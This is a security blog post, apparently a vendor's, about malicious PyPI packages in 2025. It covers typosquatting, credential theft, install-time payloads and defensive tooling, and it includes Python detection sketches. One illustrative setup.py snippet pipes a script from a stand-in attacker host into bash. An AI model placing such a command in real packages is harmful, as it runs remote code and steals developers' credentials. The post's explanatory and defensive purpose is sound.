PyPI Malicious Packages 2025: Python's Growing Supply Chain Problem

PyPI faced a surge of malicious package uploads in early 2025, targeting data science, AI/ML, and cloud development workflows. Here's the full picture.

The Python Package Index (PyPI) — the primary repository for Python packages with over 500,000 projects — saw a significant escalation in malicious package campaigns through early 2025. Security researchers from multiple firms identified coordinated upload campaigns targeting Python developers working in data science, machine learning, cloud infrastructure, and cryptocurrency development.

Python's dominance in AI/ML development has made PyPI an increasingly attractive target. When every data scientist and ML engineer runs pip install dozens of times a day, the probability of someone installing a malicious package through typosquatting or social engineering grows proportionally.

Scale of the Problem

In the first quarter of 2025:

Over 500 malicious packages were identified and removed from PyPI
Multiple coordinated campaigns targeted specific developer communities
AI/ML-themed packages accounted for approximately 30% of malicious uploads
Credential theft remained the primary payload objective
Cloud infrastructure targeting increased significantly, with packages designed to steal AWS, GCP, and Azure credentials

PyPI's volunteer-staffed moderation team, supported by automated scanning, removed packages as quickly as they were identified. But the exposure window, the time between upload and removal, ranged from hours to days, and during that window any developer could download and install the malicious code.

Attack Campaigns

AI/ML typosquatting wave

The explosive growth of Python AI/ML libraries created fertile ground for typosquatting. Packages mimicking popular libraries were uploaded with names like:

Variants of transformers, pytorch, tensorflow, and scikit-learn
Fake "helper" or "utils" packages for popular AI frameworks
Packages claiming to provide GPU optimization or model quantization utilities

These packages targeted a developer demographic that often works in environments with elevated privileges, with access to training data, cloud compute resources, and model repositories. The payloads focused on stealing:

Hugging Face API tokens
Cloud provider credentials
SSH keys used for cluster access
Weights & Biases and MLflow credentials
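
One way to catch lookalike names of the kind described above is to compare each requested package against a list of names you already trust. The sketch below is a minimal illustration using only the standard library. The KNOWN_PACKAGES set, the 0.85 threshold, and the function names are assumptions made for this example, not part of any PyPI or pip tooling.

```python
import re
from difflib import SequenceMatcher

# Hypothetical allowlist; in practice this would be your organization's approved packages.
KNOWN_PACKAGES = {"transformers", "torch", "tensorflow", "scikit-learn", "boto3"}


def normalize(name: str) -> str:
    """Normalize a project name the way PEP 503 does (case, '-', '_', '.')."""
    return re.sub(r"[-_.]+", "-", name).lower()


def likely_typosquat(name: str, known=KNOWN_PACKAGES, threshold: float = 0.85):
    """Return the trusted name that `name` closely resembles, or None."""
    candidate = normalize(name)
    if candidate in known:
        return None  # exact match after normalization: this is the trusted name
    for real in sorted(known):
        # ratio() is 1.0 for identical strings and falls as the strings diverge
        if SequenceMatcher(None, candidate, real).ratio() >= threshold:
            return real
    return None
```

A check like this only flags near-misses of names on the list. It will not catch a convincing but entirely new name such as a fake "helper" package, so it complements manual review rather than replacing it.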

Cloud development targeting

A second set of packages was designed to intercept cloud infrastructure credentials:

Typosquats of boto3 (AWS SDK), google-cloud-* packages, and azure-* packages
Fake infrastructure-as-code helper libraries
Packages impersonating internal tooling names discovered through GitHub reconnaissance

The payloads exfiltrated credentials and in some cases deployed persistent backdoors that survived beyond the initial Python session.

Cryptocurrency library impersonation

Fake packages targeting cryptocurrency developers included:

Wallet library impersonations that intercepted private keys
Exchange API wrappers that modified transaction recipients
DeFi development tools that included key-logging functionality

Given that cryptocurrency transactions are irreversible, these attacks had immediate, unrecoverable financial impact on victims.

Technical Techniques

setup.py exploitation

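A package's setup.py is ordinary Python that pip executes when it builds and installs a source distribution (prebuilt wheels do not run setup.py at install time). Malicious packages use this to execute payloads before the developer even imports the package:

# Illustrative only: module-level code runs as soon as pip executes setup.py.
import os
from setuptools import setup
# Downloads a remote script and runs it with the installing user's permissions.
os.system("curl -s https://attacker.com/payload.sh | bash")
setup(name="legitimate-looking-name", ...)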

The code runs with the installer's permissions, which in many development environments includes access to cloud credentials, SSH keys, and CI/CD secrets.
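
Because the payload sits in plain Python, a reviewer can look for it without running anything. The following is a rough sketch of such a check using the standard ast module, which parses source code but never executes it. The SUSPICIOUS_CALLS set and the function names are assumptions chosen for illustration, and the list is far from exhaustive.

```python
import ast

# Calls that rarely belong in an install script. Illustrative, not exhaustive.
SUSPICIOUS_CALLS = {
    "os.system", "os.popen", "subprocess.run", "subprocess.Popen",
    "subprocess.call", "subprocess.check_output", "exec", "eval",
}


def dotted_name(node: ast.AST) -> str:
    """Rebuild a dotted name such as 'os.system' from a Name/Attribute chain."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
    return ".".join(reversed(parts))


def find_suspicious_calls(source: str):
    """Return sorted (line_number, call_name) pairs for flagged calls."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name in SUSPICIOUS_CALLS:
                hits.append((node.lineno, name))
    return sorted(hits)
```

Name matching like this is easy to evade (aliased imports, getattr tricks, encoded strings), so a clean result is not proof of safety. It is best treated as a cheap first filter that tells a reviewer where to look.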

Conditional execution

Sophisticated packages check their environment before executing payloads:

Detecting CI/CD environments (checking for CI, GITHUB_ACTIONS, JENKINS_URL variables)
Targeting specific operating systems
Checking for the presence of specific tools or files that indicate high-value targets
Delaying execution to evade sandbox analysis
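
Environment checks like these leave traces in the source, and an install script that asks whether it is running in CI deserves a second look. Below is a small sketch that reports which CI-related variable names appear as string literals in a file. The CI_MARKERS set reuses the variable names listed above, and the function name is hypothetical.

```python
import ast

# Environment variable names taken from the list above.
CI_MARKERS = {"CI", "GITHUB_ACTIONS", "JENKINS_URL"}


def ci_marker_references(source: str):
    """Return the sorted CI variable names that appear as string literals."""
    found = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            if node.value in CI_MARKERS:
                found.add(node.value)
    return sorted(found)
```

Plenty of legitimate packages read these variables too, so a hit is a prompt for manual review and not a verdict. Obfuscated names (for example, strings assembled at runtime) would slip past this check.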

Steganographic payloads

Some packages embedded malicious code within seemingly legitimate data files — images, model weights, or configuration files included in the package. The setup script would extract and execute the hidden payload, bypassing static analysis that only examines Python source files.
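
One simple form of this hiding is to append data after the end of an otherwise valid image. As a hedged sketch of how a reviewer might spot that case, the function below walks the chunk structure of a PNG file (8-byte signature, then chunks of length, type, data, and CRC) and counts any bytes that follow the final IEND chunk. It covers only this one trick, and the function name is an assumption for illustration.

```python
import struct

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def png_trailing_bytes(data: bytes) -> int:
    """Return how many bytes follow the IEND chunk of a PNG.

    Raises ValueError if the data is not a PNG or has no IEND chunk.
    """
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    offset = len(PNG_SIGNATURE)
    while offset + 8 <= len(data):
        # Each chunk starts with a 4-byte big-endian length and a 4-byte type.
        length, chunk_type = struct.unpack(">I4s", data[offset:offset + 8])
        offset += 8 + length + 4  # header + chunk data + 4-byte CRC
        if chunk_type == b"IEND":
            return max(len(data) - offset, 0)
    raise ValueError("no IEND chunk found")
```

A nonzero result means something was appended to the image and is worth inspecting. Payloads hidden inside pixel data or inside model weight files need different techniques and are not detected here.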

Dependency chain poisoning

Rather than making the malicious package itself suspicious, some campaigns created chains of packages where:

Package A appears clean and provides useful functionality
Package A depends on Package B, which also appears clean
Package B depends on Package C, which contains the malicious payload

This multi-layer approach makes detection harder because each individual package may not trigger security alerts.
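
The practical consequence is that review has to cover the whole tree, not only the package you asked for. The sketch below assumes the dependency graph is already available as a plain dictionary (a hypothetical input format chosen for this example) and lists every package reachable from a root along with how many hops away it sits.

```python
from collections import deque


def transitive_dependencies(graph: dict, root: str) -> dict:
    """Map each package reachable from `root` to its depth in the chain."""
    depths = {}
    queue = deque((dep, 1) for dep in graph.get(root, []))
    while queue:
        name, depth = queue.popleft()
        if name in depths or name == root:
            continue  # already visited, or a cycle back to the root
        depths[name] = depth
        queue.extend((dep, depth + 1) for dep in graph.get(name, []))
    return depths


# The three-package chain described above, with placeholder names.
chain = {"package-a": ["package-b"], "package-b": ["package-c"], "package-c": []}
print(transitive_dependencies(chain, "package-a"))
```

For packages that are already installed, a graph like this could be built from importlib.metadata.requires(), which returns each distribution's declared requirement strings. Parsing those strings into bare names is left out of this sketch.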

PyPI's Defensive Evolution

PyPI has implemented several security improvements:

Mandatory 2FA, first for maintainers of critical projects and, since the start of 2024, for all accounts that upload or manage projects
Trusted Publishers using OpenID Connect for automated publishing from CI/CD
Malware detection scanning using pattern matching and behavioral analysis
Rate limiting on new package registrations
Package provenance through Sigstore integration

These measures have raised the bar for attackers but haven't eliminated the problem. The fundamental challenge is that PyPI is a public repository that accepts uploads from anyone, and the volume of legitimate uploads makes manual review impossible.

Defensive Strategies for Python Developers

Virtual environments always

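Never install packages into your system Python. Use virtual environments (venv, conda, poetry) for every project. This keeps a malicious package out of your system-wide site-packages and makes cleanup simpler. A virtual environment is not a sandbox, though: install-time code still runs with your user's permissions and can read anything your account can. For packages you do not yet trust, install inside a container or disposable VM.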
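
A small guard can make this rule harder to forget. The sketch below shows one common way to check whether the current interpreter is running inside a venv-style environment, by comparing sys.prefix with sys.base_prefix. The function name is an assumption, and this check does not detect conda environments, which do not change base_prefix.

```python
import sys


def in_virtualenv() -> bool:
    """True when the interpreter runs inside a venv-style virtual environment."""
    # Inside a venv, sys.prefix points at the environment while
    # sys.base_prefix still points at the interpreter it was created from.
    return sys.prefix != getattr(sys, "base_prefix", sys.prefix)


if __name__ == "__main__":
    print("virtual environment active:", in_virtualenv())
```

A project bootstrap script could call this and refuse to continue when it returns False.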

Pin dependencies and use hash verification

Run pip install --require-hashes -r requirements.txt with every requirement pinned to an exact version and hash. pip then refuses to install any file whose digest does not match, so the artifacts you reviewed are the ones that get installed.

requests==2.31.0 --hash=sha256:58cd2187c01e70e6e26505bca751777aa9f2ee0b7f4300988b709f44e013003f
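
To make the mechanism concrete, here is a minimal sketch of the comparison that hash pinning relies on: compute the SHA-256 digest of a downloaded file and compare it with the pinned value. pip performs this check itself in hash-checking mode. The function names and the "sha256:<hex>" pin format handling are assumptions written for illustration.

```python
import hashlib


def sha256_of(stream, chunk_size: int = 1 << 20) -> str:
    """Return the hex SHA-256 digest of a binary stream, read in chunks."""
    digest = hashlib.sha256()
    for chunk in iter(lambda: stream.read(chunk_size), b""):
        digest.update(chunk)
    return digest.hexdigest()


def matches_pin(stream, pin: str) -> bool:
    """Compare a binary stream against a pin written as 'sha256:<hex digest>'."""
    algorithm, _, expected = pin.partition(":")
    if algorithm != "sha256":
        raise ValueError(f"unsupported hash algorithm: {algorithm!r}")
    return sha256_of(stream) == expected.lower()
```

To check a file on disk, open it in binary mode (open(path, "rb")) and pass the file object together with the pin from your requirements file.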

Audit new dependencies

Before adding a new dependency:

Check the package's age, download count, and maintainer history
Review the source code, especially setup.py and __init__.py
Check for install-time execution hooks
Verify the package on PyPI matches what's on GitHub
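
Part of this checklist can be scripted. The sketch below estimates a project's age from PyPI's JSON API (https://pypi.org/pypi/<name>/json) by finding the earliest upload time across all release files. The function names are hypothetical. The parsing functions take the already-decoded JSON so they can be exercised without network access.

```python
import json
from datetime import datetime, timezone
from urllib.request import urlopen


def fetch_metadata(name: str) -> dict:
    """Download a project's metadata from PyPI's JSON API."""
    with urlopen(f"https://pypi.org/pypi/{name}/json", timeout=10) as response:
        return json.load(response)


def first_upload(metadata: dict):
    """Return the earliest file upload time across all releases, or None."""
    times = [
        # Older Python versions reject a trailing 'Z', so rewrite it as an offset.
        datetime.fromisoformat(f["upload_time_iso_8601"].replace("Z", "+00:00"))
        for files in metadata.get("releases", {}).values()
        for f in files
    ]
    return min(times, default=None)


def age_in_days(metadata: dict, now=None):
    """Days since the project's first upload, or None if it has no files."""
    first = first_upload(metadata)
    if first is None:
        return None
    now = now or datetime.now(timezone.utc)
    return (now - first).days
```

A call such as age_in_days(fetch_metadata("some-package")) returning a very small number for a package that claims to be an established library is a reason to slow down. Age alone proves nothing, so it should be weighed alongside the other checks in the list.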

Use dependency scanning tools

Integrate automated dependency scanning into your development workflow:

PyPI advisory database checks
Commercial tools (Snyk, Socket.dev, Phylum)
Open source options (pip-audit, safety)
SBOM generation for all Python projects

Private package index

For organizations with internal packages, use a private package index (Artifactory, Nexus, devpi) configured as the single source that pip resolves from. Routing every install through one index you control helps prevent dependency confusion attacks and allows pre-screening of external packages.
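
One configuration detail matters here: pip's --extra-index-url option adds a second index without giving either one priority, so a public package with the same name as an internal one can still win resolution. The sketch below flags that option in a requirements file. The function name and the example index URL are placeholders invented for illustration.

```python
def risky_index_lines(requirements_text: str):
    """Return (line_number, line) pairs that add a second package index."""
    hits = []
    for number, raw in enumerate(requirements_text.splitlines(), start=1):
        line = raw.strip()
        if line.startswith("#"):
            continue  # skip comment lines
        if line.startswith("--extra-index-url"):
            hits.append((number, line))
    return hits


# Placeholder requirements content; the internal URL is hypothetical.
example = """\
--index-url https://pypi.internal.example/simple
--extra-index-url https://pypi.org/simple
requests==2.31.0
"""
print(risky_index_lines(example))
```

The same option can also be set in pip configuration files and environment variables, which this sketch does not inspect.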

How Safeguard.sh Helps

Safeguard.sh provides comprehensive Python supply chain security through automated SBOM generation and continuous dependency monitoring. The platform tracks every Python package in your projects — direct dependencies and the full transitive tree — and correlates them against known vulnerability databases and malicious package feeds.

When a new malicious PyPI package is identified, Safeguard.sh immediately checks your entire organization's Python dependency trees for exposure. This is critical for large organizations with hundreds of Python projects where manual auditing is impossible.

The platform's policy engine can enforce Python-specific security standards: requiring hash verification, flagging packages with install-time scripts, alerting on new dependencies, and blocking packages that match known malicious patterns. For AI/ML teams working with rapidly evolving dependency stacks, Safeguard.sh provides the automated oversight that prevents supply chain compromises from reaching production.
